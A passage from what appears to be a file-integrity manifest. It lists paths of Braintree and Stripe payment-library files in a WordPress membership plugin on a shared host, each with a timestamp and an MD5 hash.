intree\\/lib\\/Braintree\\/ClientToken.php\":{\"d\":1568443921,\"h\":\"5696fee528d5c9334610f7aa3ee661d4\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/RevokedPaymentMethodMetadata.php\":{\"d\":1568443921,\"h\":\"7f20d5e2c3040d2587e0b838ef1b515a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/PaymentInstrumentType.php\":{\"d\":1568443921,\"h\":\"f84228cf81f9623b96b08dc640e5cb82\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/BinData.php\":{\"d\":1568443921,\"h\":\"fd8cb2e32a6ae63ea84bf792307f068f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Gateway.php\":{\"d\":1568443921,\"h\":\"73d12f5258a565dcf7bb1dcce0255365\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/WebhookTesting.php\":{\"d\":1568443921,\"h\":\"8b187c100420e723b25a5409d86b49f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/TextNode.php\":{\"d\":1568443921,\"h\":\"da1cc61af2896b945552318d67bd2a46\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/DiscountGateway.php\":{\"d\":1568443921,\"h\":\"8c354a122a23e3ad2136905e1c9b1d95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/EqualityNode.php\":{\"d\":1568443921,\"h\":\"62715d694920f751dfa270ee6234eb43\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/MasterpassCard.php\":{\"d\":1568443921,\"h\":\"19a65b665ece18cf560ad35f2259cbe7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/CustomerGateway.php\":{\"d\":1568443921,\"h\":\"0fd27608eb2ecfc4c9ce03e35673d76b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/LocalPaymentCompleted.php\":{\"d\":1568443921,\"h\":\"dfa8a950a05f067a59dfbbdc2bf1faec\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Instance.php\":{\"d\":1568443921,\"h\":\"827ebd75d39217e53873c82e753fc1ed\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Http.php\":{\"d\":1568443921,\"h\":\"b96151720f66b6f20fa661ad7ee16326\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/AddressGateway.php\":{\"d\":1568443921,\"h\":\"5785772be266f1095ec9badc42872eda\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/PaymentMethodNonceGateway.php\":{\"d\":1568443921,\"h\":\"f103b6749b9700a923e4cc1679f8ba4e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/DisputeSearch.php\":{\"d\":1568443921,\"h\":\"a7c9e13693413da9234b07c872207823\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/OAuthGateway.php\":{\"d\":1568443921,\"h\":\"4ab38a526f5a6009913d113da04e9bb7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Subscription.php\":{\"d\":1568443921,\"h\":\"299eb61c04e53010ec55537c7f9eb614\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/AchMandate.php\":{\"d\":1568443921,\"h\":\"77c1ae341023f424479bcbd6fa82d582\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/TestingGateway.php\":{\"d\":1568443921,\"h\":\"3ec7fe4a5a11f2db91b5ecaa6ab6d1c1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Collection.php\":{\"d\":1568443921,\"h\":\"ba52af974da21b424c7b9a6a881f4f26\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Customer.php\":{\"d\":1568443921,\"h\":\"b9de252dd036bae14952f554223e82a2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/TransactionSearch.php\":{\"d\":1568443921,\"h\":\"4ca76cec29e7bb29009b7a124ee1f85f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Xml.php\":{\"d\":1568443921,\"h\":\"30bb301518e06e41a17eb4d03c4d8db9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/AddOnGateway.php\":{\"d\":1568443921,\"h\":\"71f1cf435ad4a0f846cbdb61f54582b6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/DocumentUploadGateway.php\":{\"d\":1568443921,\"h\":\"f5874753cffc3fd3f18fa8ace92e30e5\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/ApplePayCard.php\":{\"d\":1568443921,\"h\":\"24d8bd550ef597513ecb2a106a5c3111\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Util.php\":{\"d\":1568443921,\"h\":\"a2eed2db64f35ad67c88d4da0633878c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/ApplePayGateway.php\":{\"d\":1568443921,\"h\":\"9f85f806a71c1f5334b2fbbb4a26a548\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/GrantedPaymentInstrumentUpdate.php\":{\"d\":1568443921,\"h\":\"399d0cfc2000928d87bdb534c118bea6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Discount.php\":{\"d\":1568443921,\"h\":\"f1f309b386b67fbe9c7beb678ded5876\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/PaymentMethod.php\":{\"d\":1568443921,\"h\":\"3e53b3edd2bdd87fec010709c8acab8c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/UsBankAccount.php\":{\"d\":1568443921,\"h\":\"fadd948d06404e348e88c50fab786cab\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/PlanGateway.php\":{\"d\":1568443921,\"h\":\"8713f672e916f26460b06a156b511e32\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/AddOn.php\":{\"d\":1568443921,\"h\":\"2625c42f23c3f44ad0fb3511f8065a25\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/PayPalAccountGateway.php\":{\"d\":1568443921,\"h\":\"5d0a865c2d012511f4a2b3e2c9029053\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Dispute.php\":{\"d\":1568443921,\"h\":\"307ba5b4d8e4f6c1aad66feac1acac7b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/SubscriptionGateway.php\":{\"d\":1568443921,\"h\":\"3ac1067d0e400e7f98f9122ce20756a9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/DocumentUpload.php\":{\"d\":1568443921,\"h\":\"8665ab9b93937773c5d4ccf8e476cdb3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/OAuthResult.php\":{\"d\":1568443921,\"h\":\"6f7384d12e28b6748ef3cb92128d833d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/SamsungPayCard.php\":{\"d\":1568443921,\"h\":\"fcc4437f25e792fc02bb9b748b49ad5b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/UnknownPaymentMethod.php\":{\"d\":1568443921,\"h\":\"2b5d3ccae34ae73cf728ec38266a42e3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/ssl\\/api_braintreegateway_com.ca.crt\":{\"d\":1568443921,\"h\":\"59713f80ee02d7e6a5012720e3dea7e8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/index.html\":{\"d\":1568443921,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree.php\":{\"d\":1568443921,\"h\":\"5ccd3b5ef1898588056e1b264e1d3b21\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/autoload.php\":{\"d\":1568443921,\"h\":\"700bd7dbe39f8d89d925ccbb33651898\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/index.html\":{\"d\":1568443921,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/data\\/index.html\":{\"d\":1568443921,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/data\\/ca-certificates.crt\":{\"d\":1568443921,\"h\":\"2aeba46562a9b9117a9217520f67adc0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Reporting\\/ReportRun.php\":{\"d\":1568443921,\"h\":\"0405ca4953234bdf140809907019106c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Reporting\\/ReportType.php\":{\"d\":1568443921,\"h\":\"04d3b0c97c7e1b035ecf85f083dfcfde\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Radar\\/ValueList.php\":{\"d\":1568443921,\"h\":\"a2627d6b97e98fe58c461a58160c2474\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Radar\\/EarlyFraudWarning.php\":{\"d\":1568443921,\"h\":\"4c217e1cd74d610510f6bd2ad4ec39a5\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Radar\\/ValueListItem.php\":{\"d\":1568443921,\"h\":\"beac2c5ea664b74db8a693cf2f3aaa13\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Sigma\\/ScheduledQueryRun.php\":{\"d\":1568443921,\"h\":\"9c1d6915c4ea468adf3515301f752d80\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Issuing\\/Authorization.php\":{\"d\":1568443921,\"h\":\"71ac1a5d6c9132dcae7b6a0a0f0af30f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Issuing\\/Cardholder.php\":{\"d\":1568443921,\"h\":\"131cb198998b4af3ed7649c118a912b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Issuing\\/Transaction.php\":{\"d\":1568443921,\"h\":\"e342dc919b350cd70dfc864a97c9cf4e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Issuing\\/CardDetails.php\":{\"d\":1568443921,\"h\":\"cac58d80fceb2f7aec0e643cbe612a8a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Issuing\\/Card.php\":{\"d\":1568443921,\"h\":\"1c2211ab7c4e2de1cd455a014ebd7649\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Issuing\\/Dispute.php\":{\"d\":1568443921,\"h\":\"394694c8864a8e0f1289111d68a036a8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/OAuth\\/OAuthBase.php\":{\"d\":1568443921,\"h\":\"f2f65495eebbc825508434ba4c1e7899\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/OAuth\\/InvalidClient.php\":{\"d\":1568443921,\"h\":\"d44a352a745eb628c8b337d5e39ca559\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/OAuth\\/InvalidScope.php\":{\"d\":1568443921,\"h\":\"8d4958636e2be40093bd32b3ccc49513\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/OAuth\\/UnsupportedGrantType.php\":{\"d\":1568443921,\"h\":\"a485e837f3f3e8985f1ffb85ed3762a8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/OAuth\\/InvalidRequest.php\":{\"d\":1568443921,\"h\":\"d211cbb71e871bd75baa2df0b9f88f3a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/OAuth\\/InvalidGrant.php\":{\"d\":1568443921,\"h\":\"2a5005960b63aa74a4418c053cbaa5ad\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/OAuth\\/UnsupportedResponseType.php\":{\"d\":1568443921,\"h\":\"3c2ebe5d42196516d2b10893909d2920\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/ApiConnection.php\":{\"d\":1568443921,\"h\":\"994eb513cb3951e3ba5c20b1afbbb469\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/Base.php\":{\"d\":1568443921,\"h\":\"58a575922ffebbe5e5cf75d12dcf1319\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/SignatureVerification.php\":{\"d\":1568443921,\"h\":\"bfe75c1907b85c1df14ccebb359de126\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/Api.php\":{\"d\":1568443921,\"h\":\"34a4d908182e2fe4059b47faf52d2ce8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/InvalidRequest.php\":{\"d\":1568443921,\"h\":\"13efaac768e57e650dbcda23dce823ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/Permission.php\":{\"d\":1568443921,\"h\":\"c98e43e3d6476c844d9ea4b4e8e0c496\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/RateLimit.php\":{\"d\":1568443921,\"h\":\"19155ccb558472cd51fc8eccf02ea60a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/Authentication.php\":{\"d\":1568443921,\"h\":\"c62b6348b902c57262caed0b68064438\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/Card.php\":{\"d\":1568443921,\"h\":\"b2d39732260d8b637520697ba839364f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Error\\/Idempotency.php\":{\"d\":1568443921,\"h\":\"a976eb8785a8ef31c6ddedfde3f56ae0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Checkout\\/Session.php\":{\"d\":1568443921,\"h\":\"e6d6d60aa7cf4b68e3f1da3520794cab\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/ApiOperations\\/Create.php\":{\"d\":1568443921,\"h\":\"2965cd28c647074c7a6d87ce8b74d1ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/ApiOperations\\/Delete.php\":{\"d\":1568443921,\"h\":\"d042baa1877486953cd0832affabf8ba\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/ApiOperations\\/Request.php\":{\"d\":1568443921,\"h\":\"606b2e3badd02236033fc75744ddbd9f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/ApiOperations\\/Update.php\":{\"d\":1568443921,\"h\":\"d5a95d965cdf9def9de8cfb7337d21c4\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/ApiOperations\\/Retrieve.php\":{\"d\":1568443921,\"h\":\"ac7ececb9d54c9688adae94ceeb84828\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/ApiOperations\\/All.php\":{\"d\":1568443921,\"h\":\"b64c536b68006681734108b779f0911c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/ApiOperations\\/NestedResource.php\":{\"d\":1568443921,\"h\":\"15878be27e74966ddae1495ebad9d2cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Terminal\\/Location.php\":{\"d\":1568443921,\"h\":\"8299903fc381937b68924fcc61bb5e8e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Terminal\\/ConnectionToken.php\":{\"d\":1568443921,\"h\":\"bb09523f61220074748e2e463757cbd3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Terminal\\/Reader.php\":{\"d\":1568443921,\"h\":\"ea2505930a3a31ed1a8a6c691a25e9d5\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/HttpClient\\/CurlClient.php\":{\"d\":1568443921,\"h\":\"7ed07f687fcc24d93cf7f0ba7e74c291\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/HttpClient\\/ClientInterface.php\":{\"d\":1568443921,\"h\":\"047538ebd7d217841162f5b910005fe2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Util\\/LoggerInterface.php\":{\"d\":1568443921,\"h\":\"6e4862f5873b8377667d9e2b8ada49bd\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Util\\/DefaultLogger.php\":{\"d\":1568443921,\"h\":\"db52d82f9bbcfc2275f0d23bff948b3d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Util\\/AutoPagingIterator.php\":{\"d\":1568443921,\"h\":\"d6a309266974f0792b64d009994cb82a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Util\\/RandomGenerator.php\":{\"d\":1568443921,\"h\":\"badaa472c4eaa855f6cfa13117d59ab1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Util\\/RequestOptions.php\":{\"d\":1568443921,\"h\":\"329a05415105ab4c43ec61a4221f7bf2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Util\\/Set.php\":{\"d\":1568443921,\"h\":\"daceb847dc69937037c85fa45c848de6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Util\\/CaseInsensitiveArray.php\":{\"d\":1568443921,\"h\":\"f476f884aa29383ba394238b99fb9168\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Util\\/Util.php\":{\"d\":1568443921,\"h\":\"21c6c495e3199c2a6d844066d2be3db5\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/WebhookSignature.php\":{\"d\":1568443921,\"h\":\"273d470688aae1b691570f4d72f49f19\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/ExchangeRate.php\":{\"d\":1568443921,\"h\":\"2a42fbdb16466b08c40bf8a8be6a5fa1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/SubscriptionSchedule.php\":{\"d\":1568443921,\"h\":\"e81399f604ecd7aa3477715916aa89cf\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/BitcoinReceiver.php\":{\"d\":1568443921,\"h\":\"f96cc13d6841d5875f9c6372dabc6402\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Invoice.php\":{\"d\":1568443921,\"h\":\"c6705d0b738fe33c3f878c8b5a79aada\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/index.html\":{\"d\":1568443921,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/BankAccount.php\":{\"d\":1568443921,\"h\":\"660e9c646ca889b7d3af7ad32bf64d6d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/SetupIntent.php\":{\"d\":1568443921,\"h\":\"1ee1a765069710efbc0e92e589d3f960\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/StripeObject.php\":{\"d\":1568443921,\"h\":\"6aa55e1506551a77b7a706b18736b742\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Balance.php\":{\"d\":1568443921,\"h\":\"9670b0926548145c0e4f21a207e6baec\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/SubscriptionItem.php\":{\"d\":1568443921,\"h\":\"b0cf556efeecc119e1525c9699b523b1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Coupon.php\":{\"d\":1568443921,\"h\":\"2c7dceb18cf35b5c2cc401cfdc31d453\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Source.php\":{\"d\":1568443921,\"h\":\"7e1675e7f856b196afa14a7547098deb\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/BitcoinTransaction.php\":{\"d\":1568443921,\"h\":\"8a68a194a938b9505d114199941cba36\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Event.php\":{\"d\":1568443921,\"h\":\"46a21ff2bed92a89c9a120347551d465\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/TaxRate.php\":{\"d\":1568443921,\"h\":\"3540c21fe27cd2e8aca99151ccc928fd\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/FileUpload.php\":{\"d\":1568443921,\"h\":\"b0bc4d2f2bac37ae4c72001367be8eb7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/CreditNote.php\":{\"d\":1568443921,\"h\":\"666e6da141d695669c5eb288046671fb\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/RecipientTransfer.php\":{\"d\":1568443921,\"h\":\"169f1c448cd4dbd78f38931533740eb0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/stripe-gateway\\/lib\\/Transfer.php\":{\"d\":1568443921,\"h\":\"7ac5bb